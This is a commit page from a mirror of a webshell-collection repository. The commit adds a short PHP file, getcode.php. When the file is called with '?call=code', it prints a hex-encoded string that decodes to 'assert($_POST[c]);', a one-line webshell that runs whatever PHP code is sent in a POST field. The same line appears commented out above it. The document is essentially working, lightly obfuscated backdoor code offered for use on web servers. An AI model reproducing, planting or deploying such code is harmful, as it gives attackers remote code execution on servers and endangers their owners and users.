mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
add getcode.php @tank96a 👍
author : tank96a from : http://tank96a.github.io/article/2015/04/27/php-horse/
This commit is contained in:
parent
715dc2761b
commit
b695352e18
1 changed files with 7 additions and 0 deletions
7
php/tank96a/getcode.php
Normal file
7
php/tank96a/getcode.php
Normal file
|
@ -0,0 +1,7 @@
|
|||
<?php
|
||||
//getcode.php
|
||||
//assert($_POST[c]);
|
||||
$cmd=$_GET['call'];
|
||||
if ($cmd=='code')
|
||||
echo sprintf('61737365727428245f504f53545b635d293b');
|
||||
?>
|
Loading…
Reference in a new issue